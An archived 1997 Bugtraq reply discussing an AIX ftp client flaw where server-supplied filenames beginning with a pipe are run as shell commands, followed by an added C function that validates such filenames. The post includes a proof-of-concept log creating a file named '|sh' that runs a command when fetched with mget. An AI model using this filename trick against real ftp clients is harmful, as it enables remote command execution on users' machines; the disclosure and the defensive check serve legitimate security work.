Bugtraq mailing list archives
Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client
From: af () C4C COM (af () C4C COM)
Date: Mon, 3 Nov 1997 10:03:52 -0700
ers () VNET IBM COM wrote:
VULNERABILITY: The AIX ftp client interprets server provided filenames
I. Description
The ftp client can be tricked into running arbitrary commands supplied by the remote server. When the remote file begins with a pipe symbol, the ftp client will process the contents of the remote file as a shell script.
On two machines running AIX 3.2.5 I've tested it, but instead of executing the remote file, it searches for a local file with the same name as the remote file and executes it with normal user privileges instead of root privileges.
Yes, but try "|sh" instead. I've included a log of what happens.
BTW, I believe that this also happens on HP-UX 9.05
It works on our Linux slackware as well. I suspect most ftp clients are susceptible to this "problem."

$ id
uid=100(guest) gid=100(usr)
$ pwd
/tmp/ftp-test
$ echo "id > /tmp/OUT" > "|sh"
$ ls -la
total 24
drwxr-xr-x 2 guest usr 512 Nov 3 09:45 .
drwxrwxrwt 6 bin bin 1024 Nov 3 09:44 ..
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
$ ftp localhost
Connected to localhost.
....snip....
230 User guest logged in.
ftp> cd /tmp/ftp-test
ftp> ls -l
total 24
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
ftp> mget *
mget |sh? y
150 Opening data connection for |sh (14 bytes).
15 bytes received in 0.2187 seconds (0.06699 Kbytes/s)
local: |sh remote: |sh
ftp> quit
$ ls -l /tmp/OUT
-rw-r--r-- 1 guest usr 28 Nov 3 09:45 /tmp/OUT
$ cat /tmp/OUT
uid=100(guest) gid=100(usr)
$

I also wonder about IBM's answer:
SOLUTION: Remove the setuid bit from the "ftp" command.
On our 4.2.1, ftp will not run if it is not suid. Didn't somebody test this?

Andrew Green
af () c4c com
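Added example, not part of the original post and not code from any ftp client: a check a client could apply to each server-supplied name (as in the mget above) before using it as the local file name. The function name safe_local_name and the sample names are hypothetical; the handling of "-" assumes the BSD ftp(1) convention that "-" means standard output.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Vet a filename received from an FTP server before using it as the
 * local file name. Returns 0 and copies the name into out when it is
 * acceptable, -1 otherwise. (Hypothetical helper, added example.) */
int safe_local_name(const char *remote, char *out, size_t outlen)
{
    size_t len, i;

    if (remote == NULL || out == NULL || outlen == 0)
        return -1;
    len = strlen(remote);
    if (len == 0 || len >= outlen)
        return -1;                  /* empty, or would not fit in out */

    /* Leading '|': the client would hand the rest to a shell. */
    if (remote[0] == '|')
        return -1;
    /* Leading '-': "-" is assumed to mean stdout (BSD ftp(1)). */
    if (remote[0] == '-')
        return -1;
    /* "." and ".." are never files to create. */
    if (strcmp(remote, ".") == 0 || strcmp(remote, "..") == 0)
        return -1;

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)remote[i];
        if (c == '/')               /* server must not pick the directory */
            return -1;
        if (c < 0x20 || c == 0x7f)  /* control characters */
            return -1;
    }
    memcpy(out, remote, len + 1);
    return 0;
}

int main(void)
{
    /* Constructed sample listing, as a server might return it. */
    const char *names[] = { "|sh", "notes.txt", "../.profile", "-" };
    char buf[64];
    size_t i;

    for (i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-12s %s\n", names[i],
               safe_local_name(names[i], buf, sizeof buf) == 0 ? "accept" : "reject");
    return 0;
}
```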